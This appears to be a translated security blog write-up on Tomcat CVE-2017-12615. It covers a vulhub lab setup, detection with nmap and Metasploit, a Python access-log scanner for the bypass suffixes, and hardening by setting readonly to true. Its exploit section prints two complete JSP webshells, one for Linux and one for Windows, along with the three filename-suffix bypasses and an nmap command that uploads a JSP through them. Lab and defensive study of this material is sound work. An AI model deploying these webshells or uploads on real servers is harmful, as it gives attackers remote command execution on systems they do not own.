Vulnerability description
A vulnerability was discovered in Tomcat: if the servlet context is configured with readonly = false and HTTP PUT requests are allowed, an attacker can upload a JSP file into the context and achieve code execution.
Impact version
Tomcat 7.0.0 to 7.0.79
Vulnerability environment construction
Use vulhub to start the CVE-2017-12615 environment directly with a single Docker command.
Docker quick start and vulnerability environment construction
After downloading and installing vulhub, enter the /tomcat/CVE-2017-12615
directory and execute the following command:
docker-compose up -d
Then check the current virtual machine's IP and visit port 8080; the Tomcat welcome page will appear.
Vulnerability detection
Note: if a PUT request targets a file that already exists, that file will be overwritten. In a real engagement, never PUT to index or to any existing file when testing.
nmap
command:
# nmap -p <port> <ip> --script http-put --script-args http-put.url="<remote path (directory and file name) to store the file at>",http-put.file='<full local path of the file to upload>'
nmap -p 8080 192.168.234.138 --script http-put --script-args http-put.url="/test1.txt",http-put.file='E:\1.txt'
I created a new 1.txt on my E: drive with the content: test put
The output "Successfully created"
indicates that the upload succeeded; we then access the file manually to confirm.
msf
msfconsole
search http_put
use auxiliary/scanner/http/http_put
set filedata 'test put111'
set filename test1.txt
set rhosts 192.168.234.138
set rport 8080
show options
After setting the options, run the module; a line prefixed with a plus sign indicates that the upload succeeded.
Batch check put
- nmap IP scanning rules, or the -iL parameter, can be used for batch detection
The batch detection of msf is not very stable. I can't do batch detection, but a single IP works. It is not recommended to use msf.
Exploit
Linux one-liner JSP Trojan (webshell):
# cmd2.jsp
<%
if("023".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>
Windows one-liner JSP Trojan (webshell):
#windowscmd.jsp
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
    Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
By default, Tomcat also does not allow PUT to upload .jsp and .jspx files, because requests for the jsp and jspx suffixes are dispatched to org.apache.jasper.servlet.JspServlet,
and JspServlet contains no PUT upload logic; the PUT implementation exists only in DefaultServlet.
The root cause of this vulnerability is that a specially constructed suffix bypasses Tomcat's suffix matching, so the request is handled by DefaultServlet's logic instead, which writes the JSP file to disk.
There are currently three main methods:
- evil.jsp%20
- evil.jsp::$DATA
- evil.jsp/
The file name in the PUT upload must therefore be modified with one of these bypasses:
nmap -p 8080 192.168.234.138 --script http-put --script-args http-put.url="/cmd.jsp/",http-put.file='E:\1.txt'
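A defender-side check for the three suffix tricks above, added here as an example that is not part of the original write-up: it scans Tomcat access-log lines for PUT requests and flags .jsp/.jspx names decorated with a trailing slash, a trailing space (%20) or ::$DATA. The log lines are constructed in Tomcat's common log format, and the status codes in them are assumed values.

```python
"""Flag PUT requests in a Tomcat access log that match the CVE-2017-12615 suffix tricks."""
import re
from urllib.parse import unquote
# Tomcat "common" access-log pattern: host ident user [time] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
JSP_EXT = re.compile(r"\.jspx?$", re.IGNORECASE)
# The three decorations from the write-up; compared after URL-decoding so %20 is caught
BYPASS_SUFFIXES = (("/", "trailing slash"), (" ", "trailing space (%20)"),
                   ("::$DATA", "NTFS ::$DATA stream"))

# Constructed sample log (not real traffic); status codes are assumed values
SAMPLE_LOG = """\
192.168.234.1 - - [10/Oct/2017:12:00:01 +0000] "PUT /test1.txt HTTP/1.1" 201 -
192.168.234.1 - - [10/Oct/2017:12:00:05 +0000] "PUT /cmd.jsp/ HTTP/1.1" 201 -
192.168.234.1 - - [10/Oct/2017:12:00:09 +0000] "PUT /evil.jsp%20 HTTP/1.1" 201 -
192.168.234.1 - - [10/Oct/2017:12:00:12 +0000] "PUT /evil.jsp::$DATA HTTP/1.1" 201 -
192.168.234.1 - - [10/Oct/2017:12:00:20 +0000] "GET /index.jsp HTTP/1.1" 200 11217
192.168.234.1 - - [10/Oct/2017:12:00:25 +0000] "PUT /report.jsp HTTP/1.1" 405 -
"""

def classify_put_path(raw_path):
    """Return (severity, reason) for a PUT target: high = .jsp/.jspx plus a bypass suffix;
    medium = plain .jsp/.jspx (JspServlet has no PUT logic, but still an attempt);
    info = any other PUT, where a 201 shows the context is writable (readonly=false)."""
    path = unquote(raw_path.split("?", 1)[0])
    for suffix, reason in BYPASS_SUFFIXES:
        if path.endswith(suffix) and JSP_EXT.search(path[: -len(suffix)]):
            return "high", reason
    if JSP_EXT.search(path):
        return "medium", "direct .jsp PUT"
    return "info", "PUT request"

def scan_access_log(text):
    """Return one finding dict per PUT request in the log text, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "PUT":
            continue
        severity, reason = classify_put_path(m["path"])
        findings.append({
            "client": m["client"], "time": m["time"], "path": unquote(m["path"]),
            "status": int(m["status"]), "severity": severity, "reason": reason,
            "written": m["status"] == "201",  # 201 Created: DefaultServlet stored the file
        })
    return findings
```

Any "high" finding with written=True means a JSP was actually stored; an "info" finding with 201 alone already shows the readonly=false misconfiguration.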
Access the uploaded Trojan file:
Vulnerability hardening
Edit the conf/web.xml file in the Tomcat directory, find the readonly parameter
whose value is false,
and set it to true.